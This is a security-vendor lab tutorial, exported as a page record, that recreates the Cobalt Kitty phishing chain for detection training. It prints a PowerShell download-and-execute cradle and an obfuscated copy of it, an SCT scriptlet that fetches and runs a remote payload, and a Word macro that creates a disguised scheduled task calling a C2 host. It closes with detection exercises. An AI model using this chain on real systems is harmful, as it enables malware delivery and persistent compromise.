{"id":7584,"date":"2020-06-24T09:00:00","date_gmt":"2020-06-24T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7584"},"modified":"2026-05-22T12:54:29","modified_gmt":"2026-05-22T11:54:29","slug":"attack-detection-fundamentals-initial-access-lab-3","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/","title":{"rendered":"Attack Detection Fundamentals: Initial Access &#8211; Lab #3"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Initial Access &#8211;<span class=\"blue-text\">Lab #3<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        
Network Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                24 June, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: 
<\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div 
class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Initial Access, we explored a number of offensive techniques for obtaining a foothold within a target environment through the creation and successful 
delivery of malicious documents (also known as maldocs).<\/p>\n<p>We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a third step-by-step guide to recreating the demos from that Initial Access workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/DDK_hC90kR8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noopener\">first<\/a> <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">two<\/a> labs of this series, we explored two detection strategies, parent-child process analysis (also known as process ancestry) and process network connections. These labs gave us the chance to try out the Covenant and Koadic frameworks and view opportunities for detection.<\/p>\n<p>In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#x27;mshta.exe&#x27; to run an external script. 
The external script will then download and execute a second stager that will finally inject a <a href=\"https:\/\/www.cobaltstrike.com\/\" target=\"_blank\" rel=\"noopener\">Cobalt Strike<\/a> beacon in memory using PowerShell.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/cdn2.hubspot.net\/hubfs\/3354902\/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf\" target=\"_blank\" rel=\"noopener\">Cybereason &#8211; Operation Cobalt Kitty<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1170\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Mshta<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Windows VM<\/li>\n<li>Microsoft Office<\/li>\n<li>AV + Host Firewall turned OFF<\/li>\n<li>Cobalt Strike\/Covenant\/Empire<\/li>\n<\/ul>\n<p>In the walkthrough we will use Cobalt Strike; however, the adaptation to another open-source framework is left as an exercise for the reader.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Listener Setup<\/h3>\n<p>The first step is to set up a listener in our C2 framework of choice. The specific steps may vary depending on the framework.<\/p>\n<h3>2 &#8211; PowerShell Payload<\/h3>\n<p>Once the listener is created and operational, we need to create a PowerShell launcher that will deploy our implant. 
The figure below shows how this looks within Cobalt Strike:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/10a34fcfe8c2cd1ddeed92810d901241-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The PowerShell launcher will be in the following form:<\/p>\n<pre><code class=\"language-bash\">powershell -nop -w hidden -c &quot;IEX (New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)&quot;<\/code><\/pre>\n<p>With &#x27;http:\/\/cobaltstrike.c2&#x27; replaced with your C2 IP address\/hostname.<\/p>\n<p>The aforementioned PowerShell command downloads a PowerShell script hosted on a remote server and executes it in memory, just as we saw in lab 1.<\/p>\n<p>NOTE: This is the default PowerShell download and execute cradle; other interesting and more advanced examples can be found in harmj0y&#x27;s public <a href=\"https:\/\/gist.github.com\/HarmJ0y\/bb48307ffa663256e239\" target=\"_blank\" rel=\"noopener\">gist<\/a>.<\/p>\n<p>We can break down the command as follows:<\/p>\n<ul>\n<li>&#x27;-nop&#x27;, stands for <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.core\/about\/about_profiles?view=powershell-7#the-noprofile-parameter\" target=\"_blank\" rel=\"noopener\">&quot;no profile&quot;<\/a>.<\/li>\n<li>&#x27;-w hidden&#x27;, instructs PowerShell not to create a visible window.<\/li>\n<li>&#x27;-c&#x27;, stands for &quot;command&quot; and everything that follows will be interpreted as a PowerShell command.<\/li>\n<li>&#x27;(New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)&#x27;, downloads the &#x27;evil.ps1&#x27; script and returns its contents as a string.<\/li>\n<li>&#x27;IEX&#x27;, an <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.core\/about\/about_aliases?view=powershell-7\" target=\"_blank\" 
rel=\"noopener\">alias<\/a> for &#x27;Invoke-Expression&#x27;. Takes a string as input (the result of the previous function in this case) and interprets its content as PowerShell commands.<\/li>\n<\/ul>\n<p>For the sake of this lab, we&#x27;re going to take all the code within the &#x27;-c&#x27; block and obfuscate it. In order to do so, we&#x27;re going to use the <a href=\"https:\/\/github.com\/danielbohannon\/Invoke-Obfuscation\" target=\"_blank\" rel=\"noopener\">Invoke-Obfuscation<\/a> framework that was used during Operation Cobalt Kitty&#x27;s activities.<\/p>\n<p>To use the obfuscation framework, a PowerShell interpreter is required. Since the framework does not use any Windows native functionality, any PowerShell interpreter available for other platforms like Linux or macOS will be fine.<\/p>\n<p>In order to import the Invoke-Obfuscation, clone the <a href=\"https:\/\/github.com\/danielbohannon\/Invoke-Obfuscation\" target=\"_blank\" rel=\"noopener\">master repository<\/a> and execute the following commands:<\/p>\n<pre><code class=\"language-bash\">cd Invoke-Obfuscation-master\nImport-Module .\/Invoke-Obfuscation.psd1\nInvoke-Obfuscation<\/code><\/pre>\n<p>If everything worked as expected, you should be presented with the following prompt:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/34885958b7cfb48b2dbfc1c437e22cc9-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We now need to set the command we want to obfuscate, in this case it will be something like this:<\/p>\n<pre><code class=\"language-bash\">set SCRIPTBLOCK IEX (New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)<\/code><\/pre>\n<p>The next step is to select the type of obfuscation we want to apply, for this lab we&#x27;re going to select &#x27;TOKEN&#x27;:<\/p>\n<figure><img decoding=\"async\" 
src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/18b1fc1c00be36083d257fb97b8d5f81-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The tool presents us with different obfuscation strategies, we will apply them all using the &#x27;ALL&#x27; command:<\/p>\n<p>To apply the selected transformation to our payload, we now need to press &#x27;1&#x27; and we will receive our obfuscated payload:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2cf1ae1de98aea5e99b418b322ac849c2-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The resulting payload:<\/p>\n<pre><code class=\"language-bash\">&amp;(&quot;{0}{1}&quot;-f&#x27;I&#x27;,&#x27;EX&#x27;) (.(&quot;{1}{2}{0}&quot;-f &#x27;ect&#x27;,&#x27;New-Ob&#x27;,&#x27;j&#x27;) (&quot;{3}{0}{2}{1}&quot; -f&#x27;e&#x27;,&#x27;ent&#x27;,&#x27;bcli&#x27;,&#x27;Net.W&#x27;)).(&quot;{3}{1}{0}{2}&quot;-f &#x27;tr&#x27;,&#x27;s&#x27;,&#x27;ing&#x27;,&#x27;download&#x27;).Invoke((&quot;{0}{1}{4}\n\n{2}{6}{5}{3}{7}{8}&quot; -f &#x27;http&#x27;,&#x27;:\/\/&#x27;,&#x27;obal&#x27;,&#x27;rike\/ev&#x27;,&#x27;c&#x27;,&#x27;t&#x27;,&#x27;ts&#x27;,&#x27;i&#x27;,&#x27;l.ps1&#x27;))<\/code><\/pre>\n<p>NOTE: When developing more convoluted initial access vectors, it is recommended to test each part of the payload chain to make sure that it works as expected. 
This type of testing is left to the reader.<\/p>\n<p>The final step of this stage is to save the obfuscated payload in a file called &#x27;microsoft.jpg&#x27; (the naming convention is specific to this threat actor), and host it on our C2 framework or other webserver.<\/p>\n<p>We used Cobalt Strike&#x27;s built-in HTTP server to host the file and the resulting URL will be &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;.<\/p>\n<h3>3 &#8211; SCT Payload<\/h3>\n<p>The next component of our staging process is an SCT file that will be used to execute our previously built PowerShell payload.<\/p>\n<p>SCT files can contain JavaScript or VBScript directives to execute additional commands. Examples of their usage in offensive operations can be found on MITRE&#x27;s website:<\/p>\n<ul>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Scripting<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Regsvr32<\/a><\/li>\n<\/ul>\n<p>We are using <a href=\"https:\/\/gist.github.com\/bohops\/6ded40c4989c673f2e30b9a6c1985019\" target=\"_blank\" rel=\"noopener\">this<\/a> template as a starting point for building our stager. You&#x27;ll see that the PoC in the template is used to spawn &#x27;calc.exe&#x27;:<\/p>\n<pre><code class=\"language-bash\">&lt;script language=&quot;JScript&quot;&gt;\n    &lt;![CDATA[var r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;calc.exe&quot;);]]&gt;&lt;\/script&gt;<\/code><\/pre>\n<p>In order to weaponise the PoC, we are going to substitute &#x27;calc.exe&#x27; with a PowerShell download cradle that fetches our obfuscated PowerShell launcher and executes it. 
The final code will be something similar to this:<\/p>\n<pre><code class=\"language-bash\">&lt;?XML version=&quot;1.0&quot;?&gt;\n&lt;scriptlet&gt;\n&lt;registration description=&quot;Bandit&quot; progid=&quot;Bandit&quot; version=&quot;1.00&quot; classid=&quot;{AAAA1111-0000-0000-0000-0000FEEDACDC}&quot;&gt;\n&lt;!-- Proof Of Concept - Casey Smith @subTee --&gt;\n&lt;!-- @RedCanary - https:\/\/raw.githubusercontent.com\/redcanaryco\/atomic-red-team\/atomic-dev-cs\/Windows\/Payloads\/mshta.sct --&gt;\n&lt;script language=&quot;JScript&quot;&gt;\n&lt;![CDATA[\nvar r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell.exe iex (iwr &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;)&quot;, 0, false);\n]]&gt;\n&lt;\/script&gt;\n&lt;\/registration&gt;\n\n&lt;public&gt;\n&lt;method name=&quot;Exec&quot;&gt;&lt;\/method&gt;\n&lt;\/public&gt;\n&lt;script language=&quot;JScript&quot;&gt;\n&lt;![CDATA[\nfunction Exec()\n{\nvar r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell.exe iex (iwr &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;)&quot;, 0, false);\n}\n]]&gt;\n&lt;\/script&gt;\n&lt;\/scriptlet&gt;<\/code><\/pre>\n<p>Save the file as &#x27;microsoftftp.jpg&#x27; and host it on the webserver used to serve the previously-created PowerShell stager.<\/p>\n<p>The resulting URL will be &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;.<\/p>\n<h3>4 &#8211; Macro Code<\/h3>\n<p>The final stage of our attack will be the creation of a Word document with a malicious VBA macro. 
The macro will create a scheduled task that will subsequently trigger the whole staging process we just created.<\/p>\n<p>To enable macro editing, open Word, right-click on the toolbar at the top of the screen and select &quot;Customize the Ribbon&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/1d17f4044b999f40f8000b89a5093b87-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Check the &quot;Developer&quot; box as follows:<\/p>\n<p>A &quot;Developer&quot; tab should now be visible within the toolbar. Select &quot;Visual Basic&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/19a95865ad7b9d59febf6e0b32734056-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This will open the Visual Basic editor where we will place our macro code. You can use the following code as a template:<\/p>\n<pre><code class=\"language-bash\">Sub Auto_open()\nCall Shell(&quot;schtasks \/create \/sc MINUTE \/tn &quot;&quot;Windows Error Reporting&quot;&quot; \/tr &quot;&quot;mshta.exe javascript:a=GetObject(&#x27;script:http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;).Exec();close();&quot;&quot; \/mo 15 \/F&quot;)\nEnd Sub<\/code><\/pre>\n<p>Let&#x27;s break down the macro code:<\/p>\n<ul>\n<li>&#x27;Sub Auto_open()&#x27; declares a function that will be executed automatically when the document is opened (after the user has accepted the security prompt for enabling macros).<\/li>\n<li>&#x27;Call Shell&#x27; will execute a shell command. 
In this case, we will execute &#x27;schtasks.exe&#x27;, which is the executable responsible for managing scheduled tasks within Windows systems.<\/li>\n<\/ul>\n<p>A brief description of the flags used for &#x27;schtasks&#x27; is provided below:<\/p>\n<ul>\n<li>&#x27;\/create&#x27; used to create a new task.<\/li>\n<li>&#x27;\/sc MINUTE \/mo 15&#x27; used to specify that the task will be executed every 15 minutes.<\/li>\n<li>&#x27;\/tn &quot;&quot;Windows Error Reporting&quot;&quot;&#x27; used to specify the task name; the actors chose a name that would likely blend in with other tasks.<\/li>\n<li>&#x27;\/tr &quot;&quot;mshta.exe javascript:a=GetObject(&#x27;script:http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;).Exec();close();&quot;&quot;&#x27; specifies the custom action that the task will execute. In this case it will execute our previously-created SCT file (masked as &#x27;microsoftftp.jpg&#x27;) using &#x27;mshta.exe&#x27;.<\/li>\n<\/ul>\n<p>NOTE: A more detailed analysis of this approach is presented in the original research by Cybereason (provided as a reference).<\/p>\n<p>Now it is possible to test the whole chain by clicking the &quot;Run&quot; button from the Visual Basic editor, as shown below:<\/p>\n<p>If everything worked as expected, you should now have an active session on your C2 framework using one of the delivery methods used by a real APT!<\/p>\n<p>It didn&#x27;t work? Use the following checklist for troubleshooting:<\/p>\n<ul>\n<li>Did you turn off the AV? Although this attack chain involves multiple steps, the final payload is still a default one and therefore should be picked up by AMSI\/AV.<\/li>\n<li>Is there connectivity between your testing VM where the payload was executed and the C2 server? Don&#x27;t forget the host firewall!<\/li>\n<li>When you hosted the stagers, which webserver did you use? 
Try modifying the content type of the response to &#x27;text\/plain&#x27; to avoid errors.<\/li>\n<\/ul>\n<h2>Exercises<\/h2>\n<p>The following questions will guide the reader through the analysis of the attack.<\/p>\n<ul>\n<li>Using parent-child analysis within Sysmon logs, are you able to spot any anomaly?<\/li>\n<li>Which executables were spawned by WINWORD.EXE? Are they suspicious?<\/li>\n<li>Can you identify at least one <a href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLbin<\/a> that generated a network connection? (Sysmon EID 3)<\/li>\n<li>Using static analysis techniques (<a href=\"https:\/\/www.decalage.info\/python\/oletools\" target=\"_blank\" rel=\"noopener\">oletools<\/a>, <a href=\"https:\/\/cuckoosandbox.org\/\" target=\"_blank\" rel=\"noopener\">Cuckoo<\/a>, <a href=\"https:\/\/github.com\/VirusTotal\/yara\" target=\"_blank\" rel=\"noopener\">Yara<\/a>) would you be able to create signatures for this payload?<\/li>\n<li>The macro code uses &#x27;schtasks&#x27; to create a scheduled task; could you find a stealthier way of creating such a task, without spawning additional processes? How would you detect this?<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>The third lab of this series covered the initial access mechanism employed by the Cobalt Kitty group. The attack involved multiple steps for a fully file-less chain. This example was a bit more convoluted than the other ones, but represents a more realistic scenario.<\/p>\n<p>Despite the added complexity, the detection strategies remain the same. 
In fact, parent-child process analysis combined with network events would spot every component of this chain.<\/p>\n<p>The final lab of the Initial Access workshop can be found <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-4\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' 
wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p 
class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#8216;mshta.exe&#8217; to run an external script. 
<\/p>\n","protected":false},"author":3,"featured_media":8859,"template":"","categories":[240,237,271],"labs_content_type":[296],"class_list":["post-7584","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-network-security","category-offensive-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                            <span 
class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Initial Access &#8211; Lab #3<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#039;mshta.exe&#039; to run an external script. <\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\">Read more<\/a>            <\/div>\n            